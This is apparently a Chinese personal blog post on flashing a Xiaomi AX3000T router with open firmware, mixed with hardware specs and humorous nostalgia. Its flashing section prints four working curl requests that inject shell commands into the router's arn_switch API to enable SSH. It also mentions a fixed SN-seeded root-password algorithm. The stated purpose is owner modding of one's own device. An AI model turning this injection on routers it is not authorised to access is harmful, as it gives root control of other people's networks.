写在前边#
什么叫前朝遗老呀?(战术后仰)月底还有报销额度没用完,所以就买了个 180 块钱的 ax3000t 玩一下。货是下午四点送到的,wifi7 的证是晚上八点发的。
就等我变成前朝遗老呢是吧
机器#
我对于发哥是十分有好感的,尤其是发哥的路由器 soc 方案。博通高通什么的,体验真的是远不如发哥。
小米的 ax3000t,使用的是非常成熟的方案。
| key | value |
|---|---|
| soc/cpu | MT7981B, aka Filogic 820, A53*2 @1.3GHz, 12nm |
| 内存 | 256MB ddr3 |
| 闪存 | 128MB |
| 天线 | 5 根!!(3 * 5G+2 * 2.4g) |
之所以选择它,一是便宜,刚好在可以买的价钱上,二是没有玩过 MT7981B,只玩过她大哥,所以搞来玩玩。
机器的板子 id 和 WR30U 是差不多,区别是 ax3000t 的背面的屏蔽罩没有出料。天线的数量,也不一致。
因为。。。。。。表面上,ax3000t 是四根天线,但是她实际上是五根。。。。。。。。。。
链接#
开端与落幕#
小米的路由器,在我还上中学的时候吧,刚刚开始推出第一代产品。
但是当时的,乃至以后的很长一段时间里的非旗舰机型,真的可以用电子垃圾来形容。
给我印象最深的,就是这个 4c,你很难想象,在我读大学的时间,covid 之前的历史时期里,这个屁股上只有三个眼但是四根杆杆的设备,没有 5G wifi,百兆口,摆在我大寝室友的桌子上用了四年!而且它要卖 79 块钱!79 块钱啊!而且直到今天,它仍然在小米商城里可以买到!
我真的很难想象,这个玩意和我早古年间,用过的一丢丢大小的 150M 的单天线水星小路由器有啥区别。
但是到了今天,真的好了一些了,小米的非旗舰路由器,也讲一点良心了,虽然有时候给你搞个升级换代降配置,但是至少没再有三个屁眼四根杆杆的蠢事了。小米的很多机型,也是性价比最高的机型。很大程度上,也是安全性最好的机型(除了故意留的漏洞)。
ax3000t 在最近一段时间里,被称为入门的家用 wifi6 路由器的性价比天花板。
加上今天发的证,很可能是最后的 wifi6 天花板了。发证,就是涨价的最好理由。虽然 wifi7 没啥用,虽然不会浪费钱去买 wifi7 的大多数人也都还没有买 wifi6,甚至大学生还在用四根杆杆的 100M 学姐原味路由器,但是涨价总是好的。
比起高通方案,发哥的温度低,生态好,底子厚实,价格还便宜。虽然驱动是个 bin,但是好歹它的 bin 传到了 git 上,闭源的也比没有没有强。
刷机#
其实我写这篇文章的初衷就是,没有一个很集中的地方写 ax3000t 的刷机。一方面很少有大佬会买 ax3000t 这种入门机,另一方面大家都喜欢收点钱,这也是经济下行的侧面体现了。
打开 ssh/dropbear#
小米的近期机型里,均存在命令注入漏洞。
[STOK]为一个 32 位 16 进制的哈希值,在登录小米路由器的后台可以在 url 中看到。
替换 payload 中的[STOK]为登陆后获取的有效哈希值,在类 bash 环境下执行 payload。
192.168.31.1是 ax3000t 一如既往的默认地址。
payload#
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0Anvram%20set%20ssh_en%3D1%0A"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0Anvram%20commit%0A"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0Ased%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%22debug%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%0A"
curl -X POST http://192.168.31.1/cgi-bin/luci/;stok=[STOK]/api/misystem/arn_switch -d "open=1&model=1&level=%0A%2Fetc%2Finit.d%2Fdropbear%20start%0A"
ssh 密码#
小米路由器的密码有固定算法,使用 sn 作为种子生成。
可以在很多孤寡网页中获得,sn 的大小写敏感。
获得的 root 密码应该是八位长度
连接#
dropbear 的启动需要 10 秒左右的时间。
小米的 openwrt 使用老旧的 rsa。连接 ssh。
ssh -oHostKeyAlgorithms=+ssh-rsa root@192.168.31.1
我们就可以看到熟悉的,小强5.4.171了。
我寻思,你这个小强,还是吃企鹅长大的是吧?哈哈哈哈哈
上传#
https://github.com/hanwckf/bl-mt798x/releases/ , 这里有 mt857 家族的 uboot。要我说,大学生就应该用这种 857 路由器,上 985 跳 857,四根杆杆哪里配得上双一流大学?
舞池 zip 里可以看到靓仔mt7981_ax3000t-fip***.bin
使用 scp 或者是别的姿势上传到tmp
刷入#
目标区块FIP
cd /tmp
mtd write mt7981_ax3000t-fip-fixed-parts-multi-layout.bin FIP
插电,开机#
拔电后,按住 reset 按钮,插电。插电后保持 10 秒左右,会发现 led 灯颜色变化
特别注意的是,ax3000t 和 ax6000 并不同,并不按照小米祖训,ax3000t 在 uboot 下的 ip 是192.168.1.1,而不是 192.168.31.1`
路由器后边的眼,有线连入电脑,固定网关为192.168.1.1。
访问192.168.1.1。
刷入#
在固件方面,我倾向于大佬写的 857 家族的 immortalwrt。不朽 857,难道这个寓意不厚重吗?
值得注意的是,原本的分区(stock)layout 方式,是小米的祖传 ab,56M 模式,我更喜欢不 ab,直接用 112m 的格局。
在编译时,ax3000t 厚重的 256M 内存,并不是很抗折腾,加之最近跑路盛行,clash meta 的 bug 和潜在 bug 众多,要在她小小的身躯上跑是很容易 oom 的。大学生嘛,不要对内存进行过度的扩张。
857 家族的 flash 写的真的是非常快,欻的一下就好了。
链接#
- https://openwrt.org/toh/xiaomi/redmi_ax6000#getting_stok_token
- https://github.com/hanwckf/bl-mt798x/pull/26
写在后边#
我是一个很喜欢买路由器的人。从在大学办公室的那台 tomato 开始,我就一直走在让大家网络爆炸的路上。不管是有线挂满蜘蛛网,还是无线从窗上桥接游泳馆的网,在大学里玩路由器的日子,真的是太快乐了。那时候大家的包容性很强,哪怕你只有三个眼,哪怕你只有一百兆,大家也能心平气和的继续下去 —— 因为校园网是 20M 的。